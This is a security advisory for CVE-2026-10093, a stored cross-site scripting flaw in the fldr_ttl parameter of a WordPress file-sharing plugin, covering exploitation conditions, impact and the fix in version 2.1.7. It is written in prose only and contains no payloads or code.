CVE-2026-10093

Vulnerability

The File Sharing & Download Manager – User Private Files plugin for WordPress is vulnerable to Stored Cross-Site Scripting (XSS) in all versions up to and including 2.1.6. The vulnerability exists in the inc/functions-folder.php file at line 463 [1], where the fldr_ttl parameter is insufficiently sanitized and escaped before being stored. This allows authenticated attackers to inject arbitrary web scripts that are executed when a user accesses the affected page.

Exploitation

An attacker must be authenticated with at least subscriber-level access. The attacker can create or edit a folder and supply a malicious payload in the fldr_ttl parameter. The injected script is stored in the database and rendered without proper escaping on pages that display folder titles, such as the shared files view. No additional user interaction beyond viewing the page is required for the script to execute.

Impact

Successful exploitation enables the attacker to execute arbitrary JavaScript in the context of the victim's browser. This can lead to session hijacking, credential theft, defacement, or other malicious actions performed on behalf of the victim. The impact is limited to users who view the compromised folder listing.

Mitigation

The vulnerability has been fixed in version 2.1.7 of the plugin, as indicated by the changeset [4]. Users are strongly advised to update to 2.1.7 or later immediately. No workaround is available for unpatched versions. The plugin is not listed on the CISA Known Exploited Vulnerabilities (KEV) catalog as of the publication date.